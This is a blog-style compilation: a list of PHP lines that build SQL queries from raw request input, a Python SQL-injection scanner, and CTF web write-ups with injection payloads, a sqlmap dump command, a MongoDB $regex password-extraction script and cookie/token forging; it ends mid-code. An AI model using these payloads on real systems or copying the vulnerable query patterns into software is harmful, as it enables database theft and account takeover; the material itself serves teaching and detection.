$sql = " insert into send ( send_id, user_id, book_id , subject , send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key', '$today' , '$time');";  
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '0', '0' ,'$_POST[approve]' );";  
$sql = " insert into book( book_id, book_name, book_pdf , book_detail, typebook_id) VALUES ( null, '$bookname','$bookpdf', '$_POST[book_detail]', '$_POST[typebook_id]');";  
$sql = " insert into send ( send_id, user_id, book_id , subject ,send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key' ,'$today' , '$time');";  
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '$vision[$i]', '0' ,'$_POST[approve]' );";  
$sql1 = "select * from court where court_time = '".$_GET["item"]."'";  
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC";  
$First = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC LIMIT 0,1";  
$Last = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd DESC LIMIT 0,1";  
$strSQL =" UPDATE request_color a JOIN printer_color b ON a.RequestPC = b.Printer_Color_ID SET b.ColorTotalNumber = '$ColorBalance1'  WHERE a.RequestID = '".$_GET["id"]."' ";  
$strSQL1 = "UPDATE meeting_list SET mstatus = 'S' where id = '".$_GET["id"]."' ";  
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6";  
SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6  
$strSQL = "SELECT * FROM tblmember WHERE Email = '".trim($_POST['Email'])."' ";  
$strSQL = "SELECT * FROM tblmember WHERE (FirstName LIKE '%".$_GET["txtKeyword"]."%' or Lastname LIKE '%".$_GET["txtKeyword"]."%' and Class='ผ่านการอนุมัติ') ";  
$sql_mem = "update member set fname ='$_POST[fname]',name ='$_POST[name]',birthday ='$_POST[birthday]',address ='$_POST[address]',road ='$_POST[road]',district ='$_POST[district]',city ='$_POST[city]',province ='$_POST[province]',country ='$_POST[country]',zipcode ='$_POST[zipcode]',phone ='$_POST[phone]',fax ='$_POST[fax]',mobile ='$_POST[mobile]',email ='$_POST[email]' where usermem = '$_POST[usermem]'";  
$sql = "update send_detail set open='1' where send_id='$_GET[send_id]' and user_id = $k ";  
$sql="select * from book , send ,send_detail , user , typebook where send_detail.user_id = $a and send_detail.send_id = send.send_id and send.book_id = book.book_id and send.user_id = user.user_id and book.typebook_id = typebook.typebook_id and send.send_id = '$_GET[send_id]' ";  
$sql="select * from user where user_name='$_POST[username]' and user_password='$_POST[password]'";  
$sql2="select * from admin where admin_name='$_POST[username]' and admin_password='$_POST[password]' ";  
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID"]."' ";  
$sql="INSERT INTO chat (name, texts)VALUES ('$_POST[name]','$_POST[mes]');";  
$strSQL = "SELECT * FROM accounts WHERE Username = '".trim($_POST['Username'])."' ";  
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."',  
$strSQL = "INSERT INTO accounts (Username,Password) VALUES ('".$_POST["Username"]."', '$password')";  
$sqlTb = "SELECT * FROM treatment where date='$_POST[date]'";  
$sql1 ='SELECT * FROM member WHERE username = "'.$_POST['ulog'].'"';  
$sql ="SELECT member.*,profile.* FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE 1 AND member.IDstd = '".$_POST['searchID']."' ";  
//$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";  
if($mysql->query(" SELECT * FROM [tb_student] WHERE [idStudent] like '".$_POST['ids']."'") > 0 ){  
$sql="SELECT * FROM member WHERE IDstd like '".$_POST['IDstd']."'";  
$sql = "INSERT INTO students ('name', 'last_name') VALUES('" . $_POST['student_name'][$i] . "', '" . $_POST['student_last_name'][$i] . "')";  
$res = $mysqli->query("SELECT * FROM ven_rent WHERE id_van = ".$_GET['u']);  
$strSQL = "SELECT * from objective WHERE ob_quiz_id = ".$_POST["chkColor"][$i]."";  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' ";  
$strSQL = "INSERT INTO member (Username,Password,Name,Status) VALUES ('".$_POST["txtUsername"]."',  
$strSQL = "SELECT * FROM course WHERE Id_Course = '".$_GET["Id_Course"]."' ";  
$sql1="SELECT * FROM user WHERE username='".$_GET['username']."'";  
$sql = "select * from po where POID like '%{$_POST['POID']}%'";  
$query = "SELECT * FROM teacher WHERE (T_user='".$_POST["txtT_user"]."') AND (T_pw='".$_POST["txtT_pw"]."')";  
$test_query="SELECT * FROM login WHERE username = '".$_POST['form-username']."'";  
$strSQL = "SELECT * FROM subject WHERE subject = '".trim($_POST['txtsubject'])."' ";  
$strSQL = "INSERT INTO subject (subject,course_description) VALUES ('".$_POST["txtsubject"]."','".$_POST["txtcourse_description"]."')";  
$strSQL = "SELECT * FROM course INNER JOIN type_course ON course.type_cou_id=type_course.tp_cou_id WHERE cou_id = '".$_GET['cou_id']."' ";  
$strSQL = "SELECT * FROM po2016 WHERE Po_number = '".$_GET["Po_number"]."' ";  
$strSQL1 = " SELECT * FROM drb_product WHERE drb_pd_code = 'GL-ES-".$_POST["drb_pd_codeSE"]."' ";  
$strSQL2 = " SELECT * FROM drb_product_up WHERE drb_pd_codeT = '".$_POST["drb_pd_codeT"]."' ";  
} else { $strSQL = "SELECT * FROM city WHERE ProvinceID ='".$_GET["proid"]."' ORDER BY CityNameT ASC";  
} else { $strSQL = "SELECT * FROM district WHERE CityID ='".$_GET["ampid"]."' ORDER BY DistrictNameT ASC";  
$strSQL = "SELECT * FROM webboard  WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
$strSQL2 = "SELECT * FROM reply  WHERE QuestionID = '".$_GET["QuestionID"]."' order by  replyID desc";  
$sql='SELECT * FROM tbl_member WHERE user = "'.$_POST['username'].'"';  
$sql1="INSERT INTO tbl_member value ('','".$_POST['name']."','".$_POST['username']."','".$_POST['mail']."','".$_POST['tel']."')";  
$strSQL2 = "SELECT * FROM orders_detail WHERE OrderID = '".$_GET["OrderID"]."' ";  
$strSQL = "SELECT * FROM slideshow WHERE slide_title = '".$_GET["CusID"]."' ";  
$up_Leave = "UPDATE leave_leave SET  Quota_id='$_POST[Quota_id]',  
$strSQL = "SELECT * FROM data_course WHERE cou_id = '".$_GET['cou_id']."' ";  
$sql_select_playlista     = "select * from playlist where p_playlist_name = '".$_GET['pid']."'order by p_Order ";  
$strSQL = "SELECT * FROM quotas WHERE Quota_id = '".$_POST["Quota_id"]."' ";  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."'  
$sql="select * from question where subject_id='$_GET[subject_id]' ";  
$sql="select * from choice where question_id='$_GET[question_id]' ";  
$strSQL = "SELECT * FROM it_rep_form WHERE rep_no = '".$_GET["rep_no"]."' ";  
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' ";  
$strSQL = "SELECT hex(pic1) FROM 2016_mission WHERE mission_id = '".$_GET["mission_id"]."' ";  
$strSQL = "SELECT * FROM product WHERE (id_prd LIKE '%".$_GET["txtKeyword"]."%' or ProductName LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM customer WHERE displayname = '".trim($_POST['txtUsername'])."'  
$strSQL = "update customer set namecus=". "'". $_POST["name"] ."'". ",";  
$sql="select * from allotment_item where hotel_id='".$_REQUEST["id"]."' and status='1' order by no_id ";  
$sql2="SELECT * FROM joinus WHERE eventstypecode='".$_POST["eventstypecode"]."'";  
$sql1="SELECT * FROM joinus WHERE passport = '".$_POST["scan"]."'";  
$sq1 = INSERT INTO strengthkf(keyID, strID)  VALUES ('.$_POST['chkKey'][$key].','.$strID.'); //get keyI  
$sq1 = "UPDATE strengthkf SET keyID = '".$_POST['chkKey'][$key]."'  
$strSQL = "SELECT * FROM member WHERE MemberID = '".$_POST["MemberID"]."' ";  
$strSQL = "UPDATE member SET Username = '".$_POST["Username"]."', Password = '".$_POST["Password"]."', Name_member = '".$_POST["Name_member"]."', Addr_member = '".$_POST["Addr_member"]."'  
$strSQL = "SELECT product_id, Qty FROM orders_detail where order_detail_id = ".($_REQUEST['order_detail_id'] * 1);  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["CustomerID"]."' ";  
$strSQL = "UPDATE customer SET Name_cus = '".$_POST["Name_cus"]."', Address = '".$_POST["Address"]."',  
$strSQL1 = "SELECT * FROM tb_memfamily WHERE mem_id = '".$_GET['mem_id']."' ";  
$strSQL = "SELECT * FROM product WHERE productno = '".$_GET["productno"]."'";  
$sql_insert="INSERT INTO tbl_recived (a,b,c,d,e,f,g)VALUES('$_GET[a]','$_GET','$_GET[c]','$_GET[d]','$_GET[e]','$_GET[f]',NOW())";  
$sql = "select * from  diagnosis where di_opt1= '$_REQUEST[s1]' && di_opt2= '$_REQUEST[s2]'  && di_opt3= '$_REQUEST[s3]'  && di_opt4= '$_REQUEST[s4]'  ";  
$strSQL = "SELECT * FROM employee WHERE Department = '".$_POST["department"]."' "  
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message) VALUES ('".$_POST["txt_name"]."',  
$strSQL = "INSERT INTO koreanfood (con_name,con_email,con_phone,con_message,date) VALUES ('".$_POST["txt_name"]."',  
$strSQL = "INSERT INTO info (Name,Skul,Age) VALUES ('".$_POST["txt_name"]."',  
$sql="update tb_student set stu_name='$stu_name', address='$address', status='$status' where stu_id='{$_POST['txtid']}' ";  
$sql="select * from tb_student where stu_id='{$_GET['id']}' ";  
$sql="delete from tb_student where stu_id='{$_GET['id']}'";  
$sql="UPDATE  tb_student SET stu_name='$stu_name', address='$address', status='$status' where stu_id=".$_POST['txtid'];  
$strSQL = "INSERT INTO orders (datetime,name,address,payment,date,tel,mail) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."','".$_POST["payment"]."','".$_POST["date"]."','".$_POST["tel"]."','".$_POST["mail"]."') ";  
$sql = "SELECT * FROM menu WHERE menu_name  LIKE  ('".$_POST["search"]."')%";  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID'][$i]."', Name='".$_POST['ResourceName'][$i]."', RoleName='".$_POST['RoleName'][$i]."', Category='".$_POST['ResourceCategory'][$i]."', Email='".$_POST['ResourceEmail'][$i]."', TelNo='".$_POST['ResourceTelNo'][$i]."', ResourceDeparment='".$_POST['ResourceDepartment'][$i]."' where ppid ='$ide'";  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID'][$i]."',  
$sqlr = "UPDATE  proresult set EmployeeID='".$_POST['EmployeeID$i']."',  
$strSQL2 = "INSERT INTO trans (datetime,name,address,date) VALUES ('".date("Y-m-d H:i:s")."','".$_POST["name"]."','".$_POST["address"]."' ,'".$_POST["date"]."') ";  
$strSQL = "SELECT * FROM vehicle_tb WHERE (1 AND serial = '".$_POST["sserial"]."' OR assetNumber = '".$_POST["assetNumber"]."') and assetNumber !='' ";  
$strSQL = "SELECT * FROM ordername WHERE id_order = '".$_GET["OrderID"]."' ";  
$strSQL2 = "SELECT * FROM order_detial WHERE id_order = '".$_GET["OrderID"]."' ";  
/*$strSQL = "INSERT INTO s_scroll (m_username,m_password,m_name ,m_lastname ,m_level) VALUES ('".$_POST["txtUsername"]."',  
$strSQL = "INSERT INTO s_scroll (s_name, s_text, s_color, s_bg, s_font, s_size, s_speed) VALUES ('".$_POST["T_Name"]."','".$_POST["T_Text"]."','".$_POST["T_Color"]."','".$_POST["T_BG"]."','".$_POST["T_Font"]."','".$_POST["size"]."','".$_POST["speed"]."')";  
$strSQL = "SELECT * FROM webboard WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
if(!mysqli_query($objCon,"INSERT INTO reply (QuestionID,CreateDate,Details,Name) VALUES ('".$_GET["QuestionID"]."','".date("Y-m-d H:i:s")."','".$_POST["txtDetails"]."','".$_POST["txtName"]."') ")){  
$strSQL2 = "SELECT * FROM reply WHERE QuestionID = '".$_GET["QuestionID"]."' ";  
$strSQL1 = "SELECT * FROM product WHERE ProductName LIKE('".$_GET["ProductName"]."')";  
$strSQL = "SELECT * FROM member WHERE PerId = '".trim($_POST['txtPerId'])."' ";  
$strSQL = "SELECT * FROM member WHERE DriveId = '".trim($_POST['txtDriveId'])."' ";  
$strSQL = "SELECT * FROM member WHERE Tel = '".trim($_POST['txtTel'])."' ";  
$strSQL = "SELECT * FROM member WHERE Email = '".trim($_POST['txtEmail'])."' ";  
$strSQL = "UPDATE customer SET Name = '".$_POST["txtName"]."'  
$strSQL = "SELECT * FROM addinform WHERE ID_Inform= '".$_GET["ID_Inform"]."' ";  
$strCHECK = "SELECT * FROM  checkstock WHERE shopcode = '".$_GET["shopcode"]."' AND productid = '".$_POST["productid$i"]."'";  
$result = mysql_query("update product set qty = qty + '".$_POST["qty$i"]."' where ProductID = '".$_POST["productid$i"]."'");  
$resultms = mysql_query("update ms set actqty = actqty - '".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strCHECKms = "SELECT * FROM  ms WHERE shopcode = '".$_POST["toshop"]."' AND productid = '".$_POST["productid$i"]."'";  
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$_POST["toshop"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strSQL = "SELECT * FROM person WHERE Person_ID LIKE '%".$_GET["txtKeyword"]."%' ";  
$sql = "INSERT INTO durable_goods VALUES('$_POST[Dg_idtxt]',$Dg_Income,'$_POST[Dg_nametxt]' ,'$POST[Dg_Brandtxt]','$_POST[Dg_Typetxt]','$_POST[Dg_colourtxt]', '$_POST[Dg_Sizetxt]','$_POST[PriceToUnittxt]','$_POST[Dg_budgettxt]','$_POST[Notetxt]')";  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_POST["lmName1"]."' ";  
$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";  
$sql_a = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id ";  
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]' ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id ='$_GET[Locationname_id]' ORDER BY Locationareaname_id  ";  
$strSQL2 = "SELECT * FROM location_area WHERE Locationname_id = '$_GET[Locationname_id]' ORDER BY Locationareaname_id";  
$sqlp = "INSERT INTO app_pro (appid, proname, mod, prore, probcp)VALUES('$id', '".$_POST['procname'][$i]."', '".$_POST['idmod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";  
$sqlp = "INSERT INTO app_pro (proname, mod, prore, probcp)VALUES( '".$_POST['proname'][$i]."', '".$_POST['mod'][$i]."','".$_POST['prore'][$i]."','".$_POST['probpc'][$i]."' )";  
$strsql = "INSERT INTO test (name)VALUES('".$_POST['test'][$i]."')";  
$sql = "SELECT fac_sci_name, category FROM facultysci WHERE sci_criteria <= '".$_POST['data1']."'";  
$dbname = "SELECT * FROM teacher WHERE (name LIKE '%".$_GET["search"]."%' or phone LIKE '%".$_GET["search"]."%' )";  
$strSQL = "SELECT * FROM comparison WHERE type = '".$_GET["type"]."' ";  

If code like this is used in a real web application, an attacker could break in and steal data from the database, or even take over the server hosting the application. For how to prevent and fix SQL Injection, see OWASP: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

Idea + Regexp: https://github.com/laurent22/so-sql-injections
SQL Injection Prevention Cheat Sheet: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet
P.S. For educational purposes only.
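As an added example (not the author's script, and not the regex from laurent22/so-sql-injections, which is not reproduced here), the following Python implements the same kind of line-based check with a regex of my own: a line is flagged when it builds an SQL string literal and puts a request superglobal into it, whether by interpolation ('$_GET[id]', '{$_GET['id']}') or by concatenation (. $_GET["id"] .). The only exemption is integer coercion ((int), intval() or * 1, the last of which appears in one line of the list above); trim() and similar calls are not treated as sanitizers. The sample lines are constructed from the list above plus a few safe counterparts.

```python
import re

# Superglobals that carry attacker-controlled input in PHP.
SUPERGLOBAL = r"\$_(?:GET|POST|REQUEST|COOKIE)"

# A string literal whose content starts with an SQL statement keyword.
SQL_STRING = re.compile(r"""["']\s*(?:SELECT|INSERT|UPDATE|DELETE|REPLACE)\b""", re.I)

# Any use of a superglobal: interpolated ("...'$_GET[id]'...", "...'{$_POST['id']}'...")
# or concatenated ("...'" . $_GET["id"] . "'...") - both reach the query unchanged.
SUPERGLOBAL_USE = re.compile(SUPERGLOBAL + r"\b")

# The single exemption: the value is coerced to an integer before use,
# e.g. (int)$_GET['id'], intval($_GET['id']) or $_REQUEST['id'] * 1.
# trim(), addslashes() and htmlspecialchars() are NOT sanitizers for SQL
# and are deliberately not exempted.
INT_COERCED = re.compile(
    r"(?:\(int\)\s*|intval\(\s*)" + SUPERGLOBAL + r"\[[^\]]*\]"
    r"|" + SUPERGLOBAL + r"\[[^\]]*\]\s*\*\s*1\b"
)


def _is_comment(line: str) -> bool:
    """Commented-out code cannot be exploited, so it is not counted."""
    return line.lstrip().startswith(("//", "#", "/*", "*"))


def is_sqli_candidate(line: str) -> bool:
    """True if one PHP line builds an SQL string and places a request
    superglobal in it without integer coercion. Line-based on purpose:
    a prepare() on one line and bind_param() on the next never trigger,
    while prepare() and bind_param() on the same line would be a false
    positive of this heuristic."""
    if _is_comment(line) or not SQL_STRING.search(line):
        return False
    safe_spans = [m.span() for m in INT_COERCED.finditer(line)]
    for use in SUPERGLOBAL_USE.finditer(line):
        if not any(start <= use.start() < end for start, end in safe_spans):
            return True
    return False


def scan(lines):
    """Return (1-based line number, line) for every flagged line."""
    return [(n, l) for n, l in enumerate(lines, 1) if is_sqli_candidate(l)]


# Constructed sample: lines taken from the list above, plus safe counterparts
# (integer cast, prepared statement, non-SQL output, commented-out query).
SAMPLES = [
    (r'''$strSQL = "SELECT * FROM course WHERE Id_Course = '".$_GET["Id_Course"]."' ";''', True),
    (r'''$sql="select * from question where subject_id='$_GET[subject_id]' ";''', True),
    (r'''$sql = "SELECT * FROM news WHERE ID_News='{$_GET['ID_News']}' ";''', True),
    (r'''$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' ";''', True),
    (r'''$strSQL = "SELECT product_id, Qty FROM orders_detail where order_detail_id = ".($_REQUEST['order_detail_id'] * 1);''', False),
    (r'''$strSQL = "DELETE FROM member WHERE MemberID = " . (int)$_POST["MemberID"];''', False),
    (r'''$stmt = $mysqli->prepare("SELECT * FROM course WHERE Id_Course = ?");''', False),
    (r'''$stmt->bind_param("s", $_GET["Id_Course"]);''', False),
    (r'''echo "<p>" . $_GET["name"] . "</p>";''', False),
    (r'''// $sql = "SELECT * FROM t WHERE id = '$_GET[id]'";''', False),
]

if __name__ == "__main__":
    for n, line in scan([s for s, _ in SAMPLES]):
        print("line %d: %s" % (n, line))
```

Run against a real forum dump you would feed one posted snippet per call to scan(); the hit count is a lower bound, since multi-line statements (several in the list above are cut mid-statement) only trigger when the superglobal and the SQL keyword share a line.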

Monday, 10 October 2016

HITCON CTF 2016: Are you rich? (Web) Write-up

Descriptions:
Are you rich? Buy the flag!
http://52.197.140.254/are_you_rich/
ps. You should NOT pay anything for this challenge
Some error messages which are not related to the challenge have been removed
Solution:

1. Accessing the website, there are 2 functions: Get our bitcoin address and Verify payment.


2. Try to get our bitcoin address: it generates a Bitcoin address and goes to verify it.


3. Not enough money. I guess that after getting our bitcoin address it inserts this address into the database, and Verify payment checks it. I try SQL Injection in the Address field.

4. ' or 1=1# --- Found more than 1 records?


5. ' or 1=2# --- does not have enough confirmed money?


6. Confirmed that the address parameter is vulnerable to SQL Injection. I use Burp Suite to capture the HTTP request and copy it to a text file.

POST /are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c HTTP/1.1
Host: 52.197.140.254
Proxy-Connection: keep-alive
Content-Length: 79
Cache-Control: max-age=0
Origin: http://52.197.140.254
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://52.197.140.254/are_you_rich/verify.php?address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c
Accept-Encoding: gzip, deflate
Accept-Language: th,en;q=0.8

address=1DK8jRKE5JKTdMKpPN4VAUkYRwwjYcDm2c&flag_id=flag1&submit=

7. Using the sqlmap -r option to load the HTTP request from a text file, sqlmap verifies this vulnerability as Time-Based Blind SQL Injection. The final sqlmap options used to get the flag:

python sqlmap.py -r web50.txt -p address --threads=5 --technique=T --dbms=mysql --dbs --string="Found more than" -D areyourich -T flag1 -C flag --dump

8. Wait several minutes to retrieve the flag.


In Burp Suite (Union Based)


Flag: hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}

HITCON CTF 2016: %%% (Web) Write-up

Descriptions:
Although it is easy, but I still made this challenge because it is useful in penetration testing.
http://52.196.116.69/
Solution:

1. Accessing the web, there is an error about the certificate.

2. View the certificate.


3. very-secret-area-for-ctf.orange.tw. Try modifying the hosts file.

52.196.116.69 very-secret-area-for-ctf.orange.tw

4. Access very-secret-area-for-ctf.orange.tw and get the flag.

Flag: hitcon{hihihi, how 4re y0u today?}

Monday, 5 September 2016

MMA CTF 2nd 2016: Get the admin password! (Web) Write-up

Descriptions:
Get the admin password!
http://gap.chal.ctf.westerns.tokyo/

You can use test:test
Solution: 

1. Trying to inject into the user/password fields, such as SQL Injection, does not show any more information.


2. Fuzzing via Burp Suite Pro with the Simple list "Fuzzing - SQL Injection" on user=admin&password=[Fuzz], and getting some different response lengths.


3. Using Google to search with the keywords we have, I found the backend database is MongoDB.


4. Try MongoDB injection with user=admin&password[$ne]=1, and successfully log in as admin!


5. This challenge needs the admin password, so I try the regex operator to guess the admin's password, like user=admin&password[$regex]=^TWCTF{[Fuzz]


6. Set payload type Brute forcer with the character set from $ python -c "import string; print string.printable".


7. Set the Grep - Extract option, because if the character is valid it returns HTTP status code 302 Found to redirect to the index page.


8. Start the attack and find the 1st character is "w" :)


9. Keep fuzzing to find the other characters of the admin's password.

Flag: TWCTF{wasshoi!summer_festival!}
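Steps 4 to 9 above, as an added example that is not part of the original write-up: the Python below models the challenge's pattern end to end. parse_php_form() decodes a form body the way PHP fills $_POST (so password[$ne]=1 becomes an operator object), a tiny matcher implements the $ne and $regex subset of MongoDB query semantics over a constructed user collection, login_vulnerable() passes the parsed values straight into the query, and extract_password() does what Burp Intruder did, character by character, with login success as the oracle. It goes beyond the write-up in one respect a practitioner will hit immediately: every known character is passed through re.escape, so the {, } and ! in the password are matched literally rather than being read as regex syntax. login_fixed() shows the is_string() check that closes the hole. The user documents, the charset, and the SERVER-side details are assumptions.

```python
import re
import string
from urllib.parse import parse_qsl, urlencode

# Constructed sample collection. The admin password mirrors the flag the
# write-up recovered; a real deployment would store a password hash.
USERS = [
    {"user": "test", "password": "test"},
    {"user": "admin", "password": "TWCTF{wasshoi!summer_festival!}"},
]

# Characters to try at each position (the write-up used string.printable;
# whitespace other than space is dropped here because the '$' in the
# finishing probe would also match before a trailing newline).
CHARSET = string.ascii_letters + string.digits + string.punctuation + " "


def parse_php_form(body: str) -> dict:
    """Decode a form body the way PHP fills $_POST: 'password[$ne]=1' becomes
    {'password': {'$ne': '1'}}. That array syntax is what lets a client hand
    the driver an operator object where the code expected a string."""
    out = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = re.fullmatch(r"([^\[]+)\[([^\]]*)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out


def _matches(stored, cond) -> bool:
    """Tiny subset of MongoDB query semantics: equality, $ne and $regex."""
    if not isinstance(cond, dict):
        return stored == cond
    if not isinstance(stored, str):
        return False
    for op, arg in cond.items():
        if op == "$ne":
            if stored == arg:
                return False
        elif op == "$regex":
            if re.search(arg, stored) is None:
                return False
        else:
            raise ValueError("unsupported operator " + op)
    return True


def find_one(query: dict):
    for doc in USERS:
        if all(_matches(doc.get(k), v) for k, v in query.items()):
            return doc
    return None


def login_vulnerable(body: str) -> bool:
    """The challenge's pattern: whatever PHP parsed goes straight into the query."""
    form = parse_php_form(body)
    return find_one({"user": form.get("user"), "password": form.get("password")}) is not None


def login_fixed(body: str) -> bool:
    """Fix: refuse anything that is not a plain string (PHP: is_string())."""
    form = parse_php_form(body)
    user, password = form.get("user"), form.get("password")
    if not isinstance(user, str) or not isinstance(password, str):
        return False
    return find_one({"user": user, "password": password}) is not None


def extract_password(login, user: str, charset: str = CHARSET) -> str:
    """Recover `user`'s password one character at a time through $regex,
    using login success as the oracle. Known characters pass through
    re.escape, so '{', '}' and '!' in the sample password (or '.', '$', '('
    in others) are matched literally instead of being read as regex syntax."""
    known = ""
    while True:
        # Anchored at both ends: succeeds only once the whole password is known.
        done = urlencode({"user": user, "password[$regex]": "^" + re.escape(known) + "$"})
        if login(done):
            return known
        for c in charset:
            probe = urlencode({"user": user, "password[$regex]": "^" + re.escape(known + c)})
            if login(probe):
                known += c
                break
        else:
            raise RuntimeError("no character matched at position %d" % len(known))


if __name__ == "__main__":
    print("bypass:", login_vulnerable("user=admin&password[$ne]=1"))   # True
    print("fixed :", login_fixed("user=admin&password[$ne]=1"))        # False
    print("leak  :", extract_password(login_vulnerable, "admin"))
```

Against a live target, login would wrap an HTTP POST and return whether the response was the 302 described in step 7; the regex escaping and the anchored finishing probe stay the same.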

MMA CTF 2nd 2016: glance (Misc) Write-up

Descriptions:
I saw this through a gap of the door on a train.
Solution: 

1. Get an animated gif file and go to http://gifmaker.me/exploder/ to split the gif into frames.


2. I want to concatenate all the gif images, so I go to www.google.com, search and get a useful command. http://stackoverflow.com/questions/20737061/merge-images-side-by-sidehorizontally



3. convert +append *.gif out.png



Flag: TWCTF{Bliss by Charles O'Rear}

Monday, 16 May 2016

TU CTF 2016: Duckprint (Web) Write-up

Descriptions:
See if you can steal the admin's duck print and validate it!
When calculating the SHA, leave the periods in
http://130.211.242.26:31337
Solution: 

1. This challenge has 3 pages (Register, Generate, Validate). The goal is to calculate the token and validate as admin to get the flag.

2. Register with the username "ichz"

3. Try to generate a token for my user, and see my username, admin status = 0, token, generated token.


4. The generated token format is sha256(b64(username) + "." + b64(cookie) + "." + b64(token)). Where are the admin username and admin token?

5. View the source of the Generate page and find a comment that tells me the SQL query statement on line 24. Yes, it is vulnerable to SQL Injection!


6. Try inserting a simple ' or '1'='1'-- -. I get all registered users and one of them is Admin! (DuckDuckGoose), admin position = 1, token = d4rkw1ng


7. Go to the Validate page, and get a notice that I do not have permission to access it. Cannot access.

8. In the cookies, I found duck_cookie is in JSON format and set to %7B%22username%22%3A%22ichz%22%2C%22admin%22%3A0%7D%0A, so I try changing the cookie to %7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A with the Web Developer Tool in Google Chrome and access this page again.

9. Back to the generated token format sha256(b64(username) + "." + b64(cookie) + "." + b64(token)). Finally done: I have the username and token from the SQL Injection vulnerability.

- sha256(b64('DuckDuckGoose') + "." + b64('%7B%22username%22%3A%22DuckDuckGoose%22%2C%22admin%22%3A1%7D%0A') + "." + b64('d4rkw1ng'))

- sha256('RHVja0R1Y2tHb29zZQ==.JTdCJTIydXNlcm5hbWUlMjIlM0ElMjJEdWNrRHVja0dvb3NlJTIyJTJDJTIyYWRtaW4lMjIlM0ExJTdE.ZDRya3cxbmc=')

- sha256: 29fb251184e9eadb3eb7a1790ecd1dd945525b1f50b56b261e01d9e2429cbe8b

10. Access the Validate page and submit the generated token to get the flag.

Flag: TUCTF{Quacky_McQuackerface}
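Step 9 above, as an added example that is not part of the original write-up: duck_preimage() and duck_token() reproduce the challenge's token scheme in Python, and keyed_token() shows the one-line change that would have defeated the forgery. The token is forgeable because it is an unkeyed SHA-256 over three values the attacker ends up holding (the username and token leaked through SQL injection, and a cookie the attacker sets in their own browser); the same preimage under HMAC-SHA256 with a server-only key cannot be recomputed without that key. The cookie constant is the value as it appears inside the step 9 base64 (without the trailing %0A of step 8), and SERVER_SECRET is a hypothetical placeholder.

```python
import base64
import hashlib
import hmac


def b64(s: str) -> str:
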